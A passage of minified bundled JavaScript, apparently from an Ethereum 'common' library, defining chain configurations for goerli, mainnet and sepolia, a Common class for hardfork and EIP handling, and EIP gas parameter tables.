                    value: !0
                }), t.default = {
                    name: "goerli",
                    chainId: 5,
                    networkId: 5,
                    defaultHardfork: "merge",
                    consensus: {
                        type: "poa",
                        algorithm: "clique",
                        clique: {
                            period: 15,
                            epoch: 3e4
                        }
                    },
                    comment: "Cross-client PoA test network",
                    url: "https://github.com/goerli/testnet",
                    genesis: {
                        timestamp: "0x5c51a607",
                        gasLimit: 10485760,
                        difficulty: 1,
                        nonce: "0x0000000000000000",
                        extraData: "0x22466c6578692069732061207468696e6722202d204166726900000000000000e0a2bd4258d2768837baa26a28fe71dc079f84c70000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
                    },
                    hardforks: [
                        {
                            name: "chainstart",
                            block: 0,
                            forkHash: "0xa3f5ab08"
                        },
                        {
                            name: "homestead",
                            block: 0,
                            forkHash: "0xa3f5ab08"
                        },
                        {
                            name: "tangerineWhistle",
                            block: 0,
                            forkHash: "0xa3f5ab08"
                        },
                        {
                            name: "spuriousDragon",
                            block: 0,
                            forkHash: "0xa3f5ab08"
                        },
                        {
                            name: "byzantium",
                            block: 0,
                            forkHash: "0xa3f5ab08"
                        },
                        {
                            name: "constantinople",
                            block: 0,
                            forkHash: "0xa3f5ab08"
                        },
                        {
                            name: "petersburg",
                            block: 0,
                            forkHash: "0xa3f5ab08"
                        },
                        {
                            name: "istanbul",
                            block: 1561651,
                            forkHash: "0xc25efa5c"
                        },
                        {
                            name: "berlin",
                            block: 4460644,
                            forkHash: "0x757a1c47"
                        },
                        {
                            name: "london",
                            block: 5062605,
                            forkHash: "0xb8c6299d"
                        },
                        {
                            "//_comment": "The forkHash will remain same as mergeForkIdTransition is post merge, terminal block: https://goerli.etherscan.io/block/7382818",
                            name: "merge",
                            ttd: "10790000",
                            block: 7382819,
                            forkHash: "0xb8c6299d"
                        },
                        {
                            name: "mergeForkIdTransition",
                            block: null,
                            forkHash: null
                        },
                        {
                            name: "shanghai",
                            block: null,
                            forkHash: null
                        }
                    ],
                    bootstrapNodes: [],
                    dnsNetworks: [
                        "enrtree://AKA3AM6LPBYEUDMVNU3BSVQJ5AD45Y7YPOHJLEF6W26QOE4VTUDPE@all.goerli.ethdisco.net"
                    ]
                };
            },
            3233: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "mainnet",
                    chainId: 1,
                    networkId: 1,
                    defaultHardfork: "merge",
                    consensus: {
                        type: "pow",
                        algorithm: "ethash",
                        ethash: {}
                    },
                    comment: "The Ethereum main chain",
                    url: "https://ethstats.net/",
                    genesis: {
                        gasLimit: 5e3,
                        difficulty: 17179869184,
                        nonce: "0x0000000000000042",
                        extraData: "0x11bbe8db4e347b4e8c937c1c8370e4b5ed33adb3db69cbdb7a38e1e50b1b82fa"
                    },
                    hardforks: [
                        {
                            name: "chainstart",
                            block: 0,
                            forkHash: "0xfc64ec04"
                        },
                        {
                            name: "homestead",
                            block: 115e4,
                            forkHash: "0x97c2c34c"
                        },
                        {
                            name: "dao",
                            block: 192e4,
                            forkHash: "0x91d1f948"
                        },
                        {
                            name: "tangerineWhistle",
                            block: 2463e3,
                            forkHash: "0x7a64da13"
                        },
                        {
                            name: "spuriousDragon",
                            block: 2675e3,
                            forkHash: "0x3edd5b10"
                        },
                        {
                            name: "byzantium",
                            block: 437e4,
                            forkHash: "0xa00bc324"
                        },
                        {
                            name: "constantinople",
                            block: 728e4,
                            forkHash: "0x668db0af"
                        },
                        {
                            name: "petersburg",
                            block: 728e4,
                            forkHash: "0x668db0af"
                        },
                        {
                            name: "istanbul",
                            block: 9069e3,
                            forkHash: "0x879d6e30"
                        },
                        {
                            name: "muirGlacier",
                            block: 92e5,
                            forkHash: "0xe029e991"
                        },
                        {
                            name: "berlin",
                            block: 12244e3,
                            forkHash: "0x0eb440f6"
                        },
                        {
                            name: "london",
                            block: 12965e3,
                            forkHash: "0xb715077d"
                        },
                        {
                            name: "arrowGlacier",
                            block: 13773e3,
                            forkHash: "0x20c327fc"
                        },
                        {
                            name: "grayGlacier",
                            block: 1505e4,
                            forkHash: "0xf0afd0e3"
                        },
                        {
                            "//_comment": "The forkHash will remain same as mergeForkIdTransition is post merge, terminal block: https://etherscan.io/block/15537393",
                            name: "merge",
                            ttd: "58750000000000000000000",
                            block: 15537394,
                            forkHash: "0xf0afd0e3"
                        },
                        {
                            name: "mergeForkIdTransition",
                            block: null,
                            forkHash: null
                        },
                        {
                            name: "shanghai",
                            block: null,
                            forkHash: null
                        }
                    ],
                    bootstrapNodes: [],
                    dnsNetworks: [
                        "enrtree://AKA3AM6LPBYEUDMVNU3BSVQJ5AD45Y7YPOHJLEF6W26QOE4VTUDPE@all.mainnet.ethdisco.net"
                    ]
                };
            },
            5077: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "sepolia",
                    chainId: 11155111,
                    networkId: 11155111,
                    defaultHardfork: "merge",
                    consensus: {
                        type: "pow",
                        algorithm: "ethash",
                        ethash: {}
                    },
                    comment: "PoW test network to replace Ropsten",
                    url: "https://github.com/ethereum/go-ethereum/pull/23730",
                    genesis: {
                        timestamp: "0x6159af19",
                        gasLimit: 3e7,
                        difficulty: 131072,
                        nonce: "0x0000000000000000",
                        extraData: "0x5365706f6c69612c20417468656e732c204174746963612c2047726565636521"
                    },
                    hardforks: [
                        {
                            name: "chainstart",
                            block: 0,
                            forkHash: "0xfe3366e7"
                        },
                        {
                            name: "homestead",
                            block: 0,
                            forkHash: "0xfe3366e7"
                        },
                        {
                            name: "tangerineWhistle",
                            block: 0,
                            forkHash: "0xfe3366e7"
                        },
                        {
                            name: "spuriousDragon",
                            block: 0,
                            forkHash: "0xfe3366e7"
                        },
                        {
                            name: "byzantium",
                            block: 0,
                            forkHash: "0xfe3366e7"
                        },
                        {
                            name: "constantinople",
                            block: 0,
                            forkHash: "0xfe3366e7"
                        },
                        {
                            name: "petersburg",
                            block: 0,
                            forkHash: "0xfe3366e7"
                        },
                        {
                            name: "istanbul",
                            block: 0,
                            forkHash: "0xfe3366e7"
                        },
                        {
                            name: "muirGlacier",
                            block: 0,
                            forkHash: "0xfe3366e7"
                        },
                        {
                            name: "berlin",
                            block: 0,
                            forkHash: "0xfe3366e7"
                        },
                        {
                            name: "london",
                            block: 0,
                            forkHash: "0xfe3366e7"
                        },
                        {
                            "//_comment": "The forkHash will remain same as mergeForkIdTransition is post merge, terminal block: https://sepolia.etherscan.io/block/1450408",
                            name: "merge",
                            ttd: "17000000000000000",
                            block: 1450409,
                            forkHash: "0xfe3366e7"
                        },
                        {
                            name: "mergeForkIdTransition",
                            block: 1735371,
                            forkHash: "0xb96cbd13"
                        },
                        {
                            name: "shanghai",
                            block: null,
                            timestamp: "1677557088",
                            forkHash: "0xf7f9bc08"
                        }
                    ],
                    bootstrapNodes: [],
                    dnsNetworks: [
                        "enrtree://AKA3AM6LPBYEUDMVNU3BSVQJ5AD45Y7YPOHJLEF6W26QOE4VTUDPE@all.sepolia.ethdisco.net"
                    ]
                };
            },
            6664: function(e, t, r) {
                "use strict";
                var n = this && this.__importDefault || function(e) {
                    return e && e.__esModule ? e : {
                        default: e
                    };
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.Common = void 0;
                const i = n(r(1238)), o = r(2699), s = r(9634), a = r(850), u = r(2290), c = n(r(7634)), l = n(r(3233)), d = n(r(5077)), h = r(5257), f = r(4443), p = r(9137), { buf: m } = i.default;
                class g extends o.EventEmitter {
                    constructor(e){
                        var t, r;
                        super(), this._eips = [], this._customChains = null !== (t = e.customChains) && void 0 !== t ? t : [], this._chainParams = this.setChain(e.chain), this.DEFAULT_HARDFORK = null !== (r = this._chainParams.defaultHardfork) && void 0 !== r ? r : f.Hardfork.Merge, this.HARDFORK_CHANGES = this.hardforks().map((e)=>[
                                e.name,
                                p.hardforks[e.name]
                            ]), this._hardfork = this.DEFAULT_HARDFORK, void 0 !== e.hardfork && this.setHardfork(e.hardfork), e.eips && this.setEIPs(e.eips);
                    }
                    static custom(e, t = {}) {
                        var r;
                        const n = null !== (r = t.baseChain) && void 0 !== r ? r : "mainnet", i = Object.assign({}, g._getChainParams(n));
                        if (i.name = "custom-chain", "string" != typeof e) return new g(Object.assign({
                            chain: Object.assign(Object.assign({}, i), e)
                        }, t));
                        if (e === f.CustomChain.PolygonMainnet) return g.custom({
                            name: f.CustomChain.PolygonMainnet,
                            chainId: 137,
                            networkId: 137
                        }, t);
                        if (e === f.CustomChain.PolygonMumbai) return g.custom({
                            name: f.CustomChain.PolygonMumbai,
                            chainId: 80001,
                            networkId: 80001
                        }, t);
                        if (e === f.CustomChain.ArbitrumRinkebyTestnet) return g.custom({
                            name: f.CustomChain.ArbitrumRinkebyTestnet,
                            chainId: 421611,
                            networkId: 421611
                        }, t);
                        if (e === f.CustomChain.ArbitrumOne) return g.custom({
                            name: f.CustomChain.ArbitrumOne,
                            chainId: 42161,
                            networkId: 42161
                        }, t);
                        if (e === f.CustomChain.xDaiChain) return g.custom({
                            name: f.CustomChain.xDaiChain,
                            chainId: 100,
                            networkId: 100
                        }, t);
                        if (e === f.CustomChain.OptimisticKovan) return g.custom({
                            name: f.CustomChain.OptimisticKovan,
                            chainId: 69,
                            networkId: 69
                        }, Object.assign({
                            hardfork: f.Hardfork.Berlin
                        }, t));
                        if (e === f.CustomChain.OptimisticEthereum) return g.custom({
                            name: f.CustomChain.OptimisticEthereum,
                            chainId: 10,
                            networkId: 10
                        }, Object.assign({
                            hardfork: f.Hardfork.Berlin
                        }, t));
                        throw new Error(`Custom chain ${e} not supported`);
                    }
                    static fromGethGenesis(e, { chain: t, eips: r, genesisHash: n, hardfork: i, mergeForkIdPostMerge: o }) {
                        var s;
                        const a = (0, u.parseGethGenesis)(e, t, o), c = new g({
                            chain: null !== (s = a.name) && void 0 !== s ? s : "custom",
                            customChains: [
                                a
                            ],
                            eips: r,
                            hardfork: null != i ? i : a.hardfork
                        });
                        return void 0 !== n && c.setForkHashes(n), c;
                    }
                    static isSupportedChainId(e) {
                        const t = this._getInitializedChains();
                        return Boolean(t.names[e.toString()]);
                    }
                    static _getChainParams(e, t) {
                        let r = e;
                        const n = this._getInitializedChains(t);
                        if ("number" == typeof r || "bigint" == typeof r) {
                            if (r = r.toString(), n.names[r]) return n[n.names[r]];
                            throw new Error(`Chain with ID ${r} not supported`);
                        }
                        if (void 0 !== n[r]) return n[r];
                        throw new Error(`Chain with name ${r} not supported`);
                    }
                    setChain(e) {
                        if ("number" == typeof e || "bigint" == typeof e || "string" == typeof e) this._chainParams = g._getChainParams(e, this._customChains);
                        else {
                            if ("object" != typeof e) throw new Error("Wrong input format");
                            {
                                if (this._customChains.length > 0) throw new Error("Chain must be a string, number, or bigint when initialized with customChains passed in");
                                const t = [
                                    "networkId",
                                    "genesis",
                                    "hardforks",
                                    "bootstrapNodes"
                                ];
                                for (const r of t)if (!(r in e)) throw new Error(`Missing required chain parameter: ${r}`);
                                this._chainParams = e;
                            }
                        }
                        for (const e of this.hardforks())if (void 0 === e.block) throw new Error("Hardfork cannot have undefined block number");
                        return this._chainParams;
                    }
                    setHardfork(e) {
                        let t = !1;
                        for (const r of this.HARDFORK_CHANGES)r[0] === e && (this._hardfork !== e && (this._hardfork = e, this.emit("hardforkChanged", e)), t = !0);
                        if (!t) throw new Error(`Hardfork with name ${e} not supported`);
                    }
                    getHardforkByBlockNumber(e, t, r) {
                        const n = (0, u.toType)(e, a.TypeOutput.BigInt), i = (0, u.toType)(t, a.TypeOutput.BigInt), o = (0, u.toType)(r, a.TypeOutput.Number), s = this.hardforks().filter((e)=>null !== e.block || null !== e.ttd && void 0 !== e.ttd || void 0 !== e.timestamp), c = s.findIndex((e)=>null !== e.ttd && void 0 !== e.ttd);
                        if (s.slice(c + 1).findIndex((e)=>null !== e.ttd && void 0 !== e.ttd) >= 0) throw Error("More than one merge hardforks found with ttd specified");
                        let l = s.findIndex((e)=>null !== e.block && e.block > n || void 0 !== o && Number(e.timestamp) > o);
                        if (-1 === l) l = s.length;
                        else if (0 === l) throw Error("Must have at least one hardfork at block 0");
                        if (void 0 === o && (l -= s.slice(0, l).reverse().findIndex((e)=>null !== e.block || void 0 !== e.ttd)), l -= 1, null === s[l].block && void 0 === s[l].timestamp) (null == i || BigInt(s[l].ttd) > i) && (l -= 1);
                        else if (c >= 0 && null != i) {
                            if (l >= c && BigInt(s[c].ttd) > i) throw Error("Maximum HF determined by total difficulty is lower than the block number HF");
                            if (l < c && BigInt(s[c].ttd) <= i) throw Error("HF determined by block number is lower than the minimum total difficulty HF");
                        }
                        const d = l;
                        for(; l < s.length - 1 && s[l].block === s[l + 1].block && s[l].timestamp === s[l + 1].timestamp; l += 1);
                        if (o) {
                            if (s.slice(0, d).reduce((e, t)=>{
                                var r;
                                return Math.max(Number(null !== (r = t.timestamp) && void 0 !== r ? r : "0"), e);
                            }, 0) > o) throw Error("Maximum HF determined by timestamp is lower than the block number/ttd HF");
                            if (s.slice(l + 1).reduce((e, t)=>{
                                var r;
                                return Math.min(Number(null !== (r = t.timestamp) && void 0 !== r ? r : o), e);
                            }, o) < o) throw Error("Maximum HF determined by block number/ttd is lower than timestamp HF");
                        }
                        return s[l].name;
                    }
                    setHardforkByBlockNumber(e, t, r) {
                        const n = this.getHardforkByBlockNumber(e, t, r);
                        return this.setHardfork(n), n;
                    }
                    _getHardfork(e) {
                        const t = this.hardforks();
                        for (const r of t)if (r.name === e) return r;
                        return null;
                    }
                    setEIPs(e = []) {
                        for (const t of e){
                            if (!(t in h.EIPs)) throw new Error(`${t} not supported`);
                            const r = this.gteHardfork(h.EIPs[t].minimumHardfork);
                            if (!r) throw new Error(`${t} cannot be activated on hardfork ${this.hardfork()}, minimumHardfork: ${r}`);
                            if (void 0 !== h.EIPs[t].requiredEIPs) {
                                for (const r of h.EIPs[t].requiredEIPs)if (!e.includes(r) && !this.isActivatedEIP(r)) throw new Error(`${t} requires EIP ${r}, but is not included in the EIP list`);
                            }
                        }
                        this._eips = e;
                    }
                    param(e, t) {
                        let r;
                        for (const n of this._eips)if (r = this.paramByEIP(e, t, n), void 0 !== r) return r;
                        return this.paramByHardfork(e, t, this._hardfork);
                    }
                    paramByHardfork(e, t, r) {
                        let n = null;
                        for (const i of this.HARDFORK_CHANGES){
                            if ("eips" in i[1]) {
                                const r = i[1].eips;
                                for (const i of r){
                                    const r = this.paramByEIP(e, t, i);
                                    n = "bigint" == typeof r ? r : n;
                                }
                            } else {
                                if (void 0 === i[1][e]) throw new Error(`Topic ${e} not defined`);
                                void 0 !== i[1][e][t] && (n = i[1][e][t].v);
                            }
                            if (i[0] === r) break;
                        }
                        return BigInt(null != n ? n : 0);
                    }
                    paramByEIP(e, t, r) {
                        if (!(r in h.EIPs)) throw new Error(`${r} not supported`);
                        const n = h.EIPs[r];
                        if (!(e in n)) throw new Error(`Topic ${e} not defined`);
                        if (void 0 === n[e][t]) return;
                        const i = n[e][t].v;
                        return BigInt(i);
                    }
                    paramByBlock(e, t, r, n, i) {
                        const o = this.getHardforkByBlockNumber(r, n, i);
                        return this.paramByHardfork(e, t, o);
                    }
                    isActivatedEIP(e) {
                        if (this.eips().includes(e)) return !0;
                        for (const t of this.HARDFORK_CHANGES){
                            const r = t[1];
                            if (this.gteHardfork(r.name) && "eips" in r && r.eips.includes(e)) return !0;
                        }
                        return !1;
                    }
                    hardforkIsActiveOnBlock(e, t) {
                        const r = (0, u.toType)(t, a.TypeOutput.BigInt), n = null != e ? e : this._hardfork, i = this.hardforkBlock(n);
                        return "bigint" == typeof i && i !== BigInt(0) && r >= i;
                    }
                    activeOnBlock(e) {
                        return this.hardforkIsActiveOnBlock(null, e);
                    }
                    hardforkGteHardfork(e, t) {
                        const r = null != e ? e : this._hardfork, n = this.hardforks();
                        let i = -1, o = -1, s = 0;
                        for (const e of n)e.name === r && (i = s), e.name === t && (o = s), s += 1;
                        return i >= o && -1 !== o;
                    }
                    gteHardfork(e) {
                        return this.hardforkGteHardfork(null, e);
                    }
                    hardforkBlock(e) {
                        var t;
                        const r = null != e ? e : this._hardfork, n = null === (t = this._getHardfork(r)) || void 0 === t ? void 0 : t.block;
                        return null == n ? null : BigInt(n);
                    }
                    hardforkTimestamp(e) {
                        var t;
                        const r = null != e ? e : this._hardfork, n = null === (t = this._getHardfork(r)) || void 0 === t ? void 0 : t.timestamp;
                        return null == n ? null : BigInt(n);
                    }
                    eipBlock(e) {
                        for (const t of this.HARDFORK_CHANGES){
                            const r = t[1];
                            if ("eips" in r && r.eips.includes(e)) return this.hardforkBlock("number" == typeof t[0] ? String(t[0]) : t[0]);
                        }
                        return null;
                    }
                    hardforkTTD(e) {
                        var t;
                        const r = null != e ? e : this._hardfork, n = null === (t = this._getHardfork(r)) || void 0 === t ? void 0 : t.ttd;
                        return null == n ? null : BigInt(n);
                    }
                    isHardforkBlock(e, t) {
                        const r = (0, u.toType)(e, a.TypeOutput.BigInt), n = null != t ? t : this._hardfork, i = this.hardforkBlock(n);
                        return "bigint" == typeof i && i !== BigInt(0) && i === r;
                    }
                    nextHardforkBlockOrTimestamp(e) {
                        var t, r;
                        const n = null != e ? e : this._hardfork, i = this.hardforks();
                        let o = i.findIndex((e)=>e.name === n);
                        if (n === f.Hardfork.Merge && (o -= 1), o < 0) return null;
                        let s = null !== (t = i[o].timestamp) && void 0 !== t ? t : i[o].block;
                        s = null != s ? Number(s) : null;
                        const a = i.slice(o + 1).find((e)=>{
                            var t;
                            let r = null !== (t = e.timestamp) && void 0 !== t ? t : e.block;
                            return r = null != r ? Number(r) : null, e.name !== f.Hardfork.Merge && null != r && r !== s;
                        });
                        if (void 0 === a) return null;
                        const u = null !== (r = a.timestamp) && void 0 !== r ? r : a.block;
                        return null == u ? null : BigInt(u);
                    }
                    nextHardforkBlock(e) {
                        const t = null != e ? e : this._hardfork;
                        let r = this.hardforkBlock(t);
                        if (null === r && t === f.Hardfork.Merge) {
                            const e = this.hardforks(), t = e.findIndex((e)=>null !== e.ttd && void 0 !== e.ttd);
                            if (t < 0) throw Error("Merge hardfork should have been found");
                            r = this.hardforkBlock(e[t - 1].name);
                        }
                        return null === r ? null : this.hardforks().reduce((e, t)=>{
                            const n = BigInt(null === t.block || void 0 !== t.ttd && null !== t.ttd ? 0 : t.block);
                            return n > r && null === e ? n : e;
                        }, null);
                    }
                    isNextHardforkBlock(e, t) {
                        const r = (0, u.toType)(e, a.TypeOutput.BigInt), n = null != t ? t : this._hardfork, i = this.nextHardforkBlock(n);
                        return null !== i && i === r;
                    }
                    _calcForkHash(e, t) {
                        let r = new Uint8Array, n = 0;
                        for (const t of this.hardforks()){
                            const { block: i, timestamp: o, name: a } = t;
                            let u = null != o ? o : i;
                            if (u = null !== u ? Number(u) : null, "number" == typeof u && 0 !== u && u !== n && a !== f.Hardfork.Merge) {
                                const e = (0, s.hexToBytes)(u.toString(16).padStart(16, "0"));
                                r = (0, s.uint8ArrayConcat)(r, e), n = u;
                            }
                            if (t.name === e) break;
                        }
                        const i = (0, s.uint8ArrayConcat)(t, r);
                        return (0, s.bytesToHex)((0, u.intToUint8Array)(m(i) >>> 0));
                    }
                    forkHash(e, t) {
                        const r = null != e ? e : this._hardfork, n = this._getHardfork(r);
                        if (null === n || null === (null == n ? void 0 : n.block) && void 0 === (null == n ? void 0 : n.timestamp) && void 0 === (null == n ? void 0 : n.ttd)) throw new Error("No fork hash calculation possible for future hardfork");
                        if (null !== (null == n ? void 0 : n.forkHash) && void 0 !== (null == n ? void 0 : n.forkHash)) return n.forkHash;
                        if (!t) throw new Error("genesisHash required for forkHash calculation");
                        return this._calcForkHash(r, t);
                    }
                    hardforkForForkHash(e) {
                        const t = this.hardforks().filter((t)=>t.forkHash === e);
                        return t.length >= 1 ? t[t.length - 1] : null;
                    }
                    setForkHashes(e) {
                        var t;
                        for (const r of this.hardforks()){
                            const n = null !== (t = r.timestamp) && void 0 !== t ? t : r.block;
                            null !== r.forkHash && void 0 !== r.forkHash || null == n && void 0 === r.ttd || (r.forkHash = this.forkHash(r.name, e));
                        }
                    }
                    genesis() {
                        return this._chainParams.genesis;
                    }
                    hardforks() {
                        return this._chainParams.hardforks;
                    }
                    bootstrapNodes() {
                        return this._chainParams.bootstrapNodes;
                    }
                    dnsNetworks() {
                        return this._chainParams.dnsNetworks;
                    }
                    hardfork() {
                        return this._hardfork;
                    }
                    chainId() {
                        return BigInt(this._chainParams.chainId);
                    }
                    chainName() {
                        return this._chainParams.name;
                    }
                    networkId() {
                        return BigInt(this._chainParams.networkId);
                    }
                    eips() {
                        return this._eips;
                    }
                    consensusType() {
                        const e = this.hardfork();
                        let t;
                        for (const r of this.HARDFORK_CHANGES)if ("consensus" in r[1] && (t = r[1].consensus.type), r[0] === e) break;
                        return null != t ? t : this._chainParams.consensus.type;
                    }
                    consensusAlgorithm() {
                        const e = this.hardfork();
                        let t;
                        for (const r of this.HARDFORK_CHANGES)if ("consensus" in r[1] && (t = r[1].consensus.algorithm), r[0] === e) break;
                        return null != t ? t : this._chainParams.consensus.algorithm;
                    }
                    consensusConfig() {
                        var e;
                        const t = this.hardfork();
                        let r;
                        for (const e of this.HARDFORK_CHANGES)if ("consensus" in e[1] && (r = e[1].consensus[e[1].consensus.algorithm]), e[0] === t) break;
                        return null !== (e = null != r ? r : this._chainParams.consensus[this.consensusAlgorithm()]) && void 0 !== e ? e : {};
                    }
                    copy() {
                        const e = Object.assign(Object.create(Object.getPrototypeOf(this)), this);
                        return e.removeAllListeners(), e;
                    }
                    static _getInitializedChains(e) {
                        const t = {};
                        for (const [e, r] of Object.entries(f.Chain))t[r] = e.toLowerCase();
                        const r = {
                            mainnet: l.default,
                            goerli: c.default,
                            sepolia: d.default
                        };
                        if (e) for (const n of e){
                            const { name: e } = n;
                            t[n.chainId.toString()] = e, r[e] = n;
                        }
                        return r.names = t, r;
                    }
                }
                t.Common = g;
            },
            2819: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "EIP-1153",
                    number: 1153,
                    comment: "Transient Storage",
                    url: "https://eips.ethereum.org/EIPS/eip-1153",
                    status: "Review",
                    minimumHardfork: "chainstart",
                    requiredEIPs: [],
                    gasConfig: {},
                    gasPrices: {
                        tstore: {
                            v: 100,
                            d: "Base fee of the TSTORE opcode"
                        },
                        tload: {
                            v: 100,
                            d: "Base fee of the TLOAD opcode"
                        }
                    },
                    vm: {},
                    pow: {}
                };
            },
            4013: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "EIP-1559",
                    number: 1559,
                    comment: "Fee market change for ETH 1.0 chain",
                    url: "https://eips.ethereum.org/EIPS/eip-1559",
                    status: "Final",
                    minimumHardfork: "berlin",
                    requiredEIPs: [
                        2930
                    ],
                    gasConfig: {
                        baseFeeMaxChangeDenominator: {
                            v: 8,
                            d: "Maximum base fee change denominator"
                        },
                        elasticityMultiplier: {
                            v: 2,
                            d: "Maximum block gas target elasticity"
                        },
                        initialBaseFee: {
                            v: 1e9,
                            d: "Initial base fee on first EIP1559 block"
                        }
                    },
                    gasPrices: {},
                    vm: {},
                    pow: {}
                };
            },
            1933: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "EIP-2315",
                    number: 2315,
                    comment: "Simple subroutines for the EVM",
                    url: "https://eips.ethereum.org/EIPS/eip-2315",
                    status: "Draft",
                    minimumHardfork: "istanbul",
                    gasConfig: {},
                    gasPrices: {
                        beginsub: {
                            v: 2,
                            d: "Base fee of the BEGINSUB opcode"
                        },
                        returnsub: {
                            v: 5,
                            d: "Base fee of the RETURNSUB opcode"
                        },
                        jumpsub: {
                            v: 10,
                            d: "Base fee of the JUMPSUB opcode"
                        }
                    },
                    vm: {},
                    pow: {}
                };
            },
            4638: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "EIP-2537",
                    number: 2537,
                    comment: "BLS12-381 precompiles",
                    url: "https://eips.ethereum.org/EIPS/eip-2537",
                    status: "Draft",
                    minimumHardfork: "chainstart",
                    gasConfig: {},
                    gasPrices: {
                        Bls12381G1AddGas: {
                            v: 600,
                            d: "Gas cost of a single BLS12-381 G1 addition precompile-call"
                        },
                        Bls12381G1MulGas: {
                            v: 12e3,
                            d: "Gas cost of a single BLS12-381 G1 multiplication precompile-call"
                        },
                        Bls12381G2AddGas: {
                            v: 4500,
                            d: "Gas cost of a single BLS12-381 G2 addition precompile-call"
                        },
                        Bls12381G2MulGas: {
                            v: 55e3,
                            d: "Gas cost of a single BLS12-381 G2 multiplication precompile-call"
                        },
                        Bls12381PairingBaseGas: {
                            v: 115e3,
                            d: "Base gas cost of BLS12-381 pairing check"
                        },
                        Bls12381PairingPerPairGas: {
                            v: 23e3,
                            d: "Per-pair gas cost of BLS12-381 pairing check"
                        },
                        Bls12381MapG1Gas: {
                            v: 5500,
                            d: "Gas cost of BLS12-381 map field element to G1"
                        },
                        Bls12381MapG2Gas: {
                            v: 11e4,
                            d: "Gas cost of BLS12-381 map field element to G2"
                        },
                        Bls12381MultiExpGasDiscount: {
                            v: [
                                [
                                    1,
                                    1200
                                ],
                                [
                                    2,
                                    888
                                ],
                                [
                                    3,
                                    764
                                ],
                                [
                                    4,
                                    641
                                ],
                                [
                                    5,
                                    594
                                ],
                                [
                                    6,
                                    547
                                ],
                                [
                                    7,
                                    500
                                ],
                                [
                                    8,
                                    453
                                ],
                                [
                                    9,
                                    438
                                ],
                                [
                                    10,
                                    423
                                ],
                                [
                                    11,
                                    408
                                ],
                                [
                                    12,
                                    394
                                ],
                                [
                                    13,
                                    379
                                ],
                                [
                                    14,
                                    364
                                ],
                                [
                                    15,
                                    349
                                ],
                                [
                                    16,
                                    334
                                ],
                                [
                                    17,
                                    330
                                ],
                                [
                                    18,
                                    326
                                ],
                                [
                                    19,
                                    322
                                ],
                                [
                                    20,
                                    318
                                ],
                                [
                                    21,
                                    314
                                ],
                                [
                                    22,
                                    310
                                ],
                                [
                                    23,
                                    306
                                ],
                                [
                                    24,
                                    302
                                ],
                                [
                                    25,
                                    298
                                ],
                                [
                                    26,
                                    294
                                ],
                                [
                                    27,
                                    289
                                ],
                                [
                                    28,
                                    285
                                ],
                                [
                                    29,
                                    281
                                ],
                                [
                                    30,
                                    277
                                ],
                                [
                                    31,
                                    273
                                ],
                                [
                                    32,
                                    269
                                ],
                                [
                                    33,
                                    268
                                ],
                                [
                                    34,
                                    266
                                ],
                                [
                                    35,
                                    265
                                ],
                                [
                                    36,
                                    263
                                ],
                                [
                                    37,
                                    262
                                ],
                                [
                                    38,
                                    260
                                ],
                                [
                                    39,
                                    259
                                ],
                                [
                                    40,
                                    257
                                ],
                                [
                                    41,
                                    256
                                ],
                                [
                                    42,
                                    254
                                ],
                                [
                                    43,
                                    253
                                ],
                                [
                                    44,
                                    251
                                ],
                                [
                                    45,
                                    250
                                ],
                                [
                                    46,
                                    248
                                ],
                                [
                                    47,
                                    247
                                ],
                                [
                                    48,
                                    245
                                ],
                                [
                                    49,
                                    244
                                ],
                                [
                                    50,
                                    242
                                ],
                                [
                                    51,
                                    241
                                ],
                                [
                                    52,
                                    239
                                ],
                                [
                                    53,
                                    238
                                ],
                                [
                                    54,
                                    236
                                ],
                                [
                                    55,
                                    235
                                ],
                                [
                                    56,
                                    233
                                ],
                                [
                                    57,
                                    232
                                ],
                                [
                                    58,
                                    231
                                ],
                                [
                                    59,
                                    229
                                ],
                                [
                                    60,
                                    228
                                ],
                                [
                                    61,
                                    226
                                ],
                                [
                                    62,
                                    225
                                ],
                                [
                                    63,
                                    223
                                ],
                                [
                                    64,
                                    222
                                ],
                                [
                                    65,
                                    221
                                ],
                                [
                                    66,
                                    220
                                ],
                                [
                                    67,
                                    219
                                ],
                                [
                                    68,
                                    219
                                ],
                                [
                                    69,
                                    218
                                ],
                                [
                                    70,
                                    217
                                ],
                                [
                                    71,
                                    216
                                ],
                                [
                                    72,
                                    216
                                ],
                                [
                                    73,
                                    215
                                ],
                                [
                                    74,
                                    214
                                ],
                                [
                                    75,
                                    213
                                ],
                                [
                                    76,
                                    213
                                ],
                                [
                                    77,
                                    212
                                ],
                                [
                                    78,
                                    211
                                ],
                                [
                                    79,
                                    211
                                ],
                                [
                                    80,
                                    210
                                ],
                                [
                                    81,
                                    209
                                ],
                                [
                                    82,
                                    208
                                ],
                                [
                                    83,
                                    208
                                ],
                                [
                                    84,
                                    207
                                ],
                                [
                                    85,
                                    206
                                ],
                                [
                                    86,
                                    205
                                ],
                                [
                                    87,
                                    205
                                ],
                                [
                                    88,
                                    204
                                ],
                                [
                                    89,
                                    203
                                ],
                                [
                                    90,
                                    202
                                ],
                                [
                                    91,
                                    202
                                ],
                                [
                                    92,
                                    201
                                ],
                                [
                                    93,
                                    200
                                ],
                                [
                                    94,
                                    199
                                ],
                                [
                                    95,
                                    199
                                ],
                                [
                                    96,
                                    198
                                ],
                                [
                                    97,
                                    197
                                ],
                                [
                                    98,
                                    196
                                ],
                                [
                                    99,
                                    196
                                ],
                                [
                                    100,
                                    195
                                ],
                                [
                                    101,
                                    194
                                ],
                                [
                                    102,
                                    193
                                ],
                                [
                                    103,
                                    193
                                ],
                                [
                                    104,
                                    192
                                ],
                                [
                                    105,
                                    191
                                ],
                                [
                                    106,
                                    191
                                ],
                                [
                                    107,
                                    190
                                ],
                                [
                                    108,
                                    189
                                ],
                                [
                                    109,
                                    188
                                ],
                                [
                                    110,
                                    188
                                ],
                                [
                                    111,
                                    187
                                ],
                                [
                                    112,
                                    186
                                ],
                                [
                                    113,
                                    185
